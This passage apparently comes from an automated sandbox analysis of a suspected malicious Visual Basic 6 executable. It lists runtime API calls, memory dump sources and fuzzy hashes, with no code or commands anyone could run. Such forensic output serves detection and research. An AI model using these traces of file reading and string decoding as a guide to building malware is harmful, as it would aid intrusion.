                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 0040B3D1
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040B3E3
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                                                    • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                                                  • #598.MSVBVM60 ref: 0040B3F0
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
                                                                                                                                                                                  • String ID: PR$ SE$4
                                                                                                                                                                                  • API String ID: 3576955720-2816282373
                                                                                                                                                                                  • Opcode ID: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                                                  • Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(660E19DC,00000000,00000FEE), ref: 004191A8
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004191B0
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 004191B4
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 004191CC
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 004191DB
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 004191F4
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 00419206
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00419217
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041922B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00419235
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00419245
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00419259
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041928D
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004192A6
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,0041B1A0,00000000), ref: 004192F5
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004192FE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041930B
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,0041B1A4,00000000), ref: 0041931C
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,0041B110,00000000), ref: 0041932C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00419341
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00419359
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00419368
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?), ref: 00419379
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00419384
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 00419396
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041939F
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
                                                                                                                                                                                  • __vbaUI1I2.MSVBVM60 ref: 004193CC
                                                                                                                                                                                  • __vbaUI1I2.MSVBVM60 ref: 004193F8
                                                                                                                                                                                  • __vbaUI1I2.MSVBVM60 ref: 00419402
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3049632819-0
                                                                                                                                                                                  • Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                                                  • Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(660E1A08,00000000,660E6C4A), ref: 00415DA5
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00415DAD
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 00415DB1
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415DFA
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 00415E97
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415F32
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
                                                                                                                                                                                  • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00416032
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 0041603C
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 004160A5
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 004160AE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 004160D9
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00416126), ref: 00416103
                                                                                                                                                                                  • __vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00416123
                                                                                                                                                                                    • Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2812220623-0
                                                                                                                                                                                  • Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                                                  • Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00412929
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00412938
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041294C
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041296A
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00412971
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004129B3
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004129CE
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 00412A2E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00412A39
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412A49
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412A64
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00412A8C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00412AAA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
                                                                                                                                                                                  • #616.MSVBVM60(00000000), ref: 00412AC2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00412ACD
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000004), ref: 00412B57
                                                                                                                                                                                  • #618.MSVBVM60(00000000), ref: 00412B5E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00412B69
                                                                                                                                                                                  • __vbaI4Str.MSVBVM60(00000000), ref: 00412B70
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00412C00
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 277344030-0
                                                                                                                                                                                  • Opcode ID: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                                                  • Instruction ID: f355006ae09e1e352358bc31eb7e3acedda410367e126062bc5f553c60d2b707
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D891C8B1D00208EFDB04DFE4DE58BDEBBB4BB48305F208169E612B76A0DB745A45CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0040EB1A
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                                                  • #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                                                  • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
                                                                                                                                                                                  • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
                                                                                                                                                                                  • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
                                                                                                                                                                                  • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
                                                                                                                                                                                  • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
                                                                                                                                                                                  • #537.MSVBVM60(?,?), ref: 0040ED54
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040EDEC
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                                                  • String ID: gfff$gfff
                                                                                                                                                                                  • API String ID: 2397813863-3084402119
                                                                                                                                                                                  • Opcode ID: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                                                  • Instruction ID: 69a6bd49322be43a13479f126592eb8a048afae0e7896bfb7d302a94b416162a
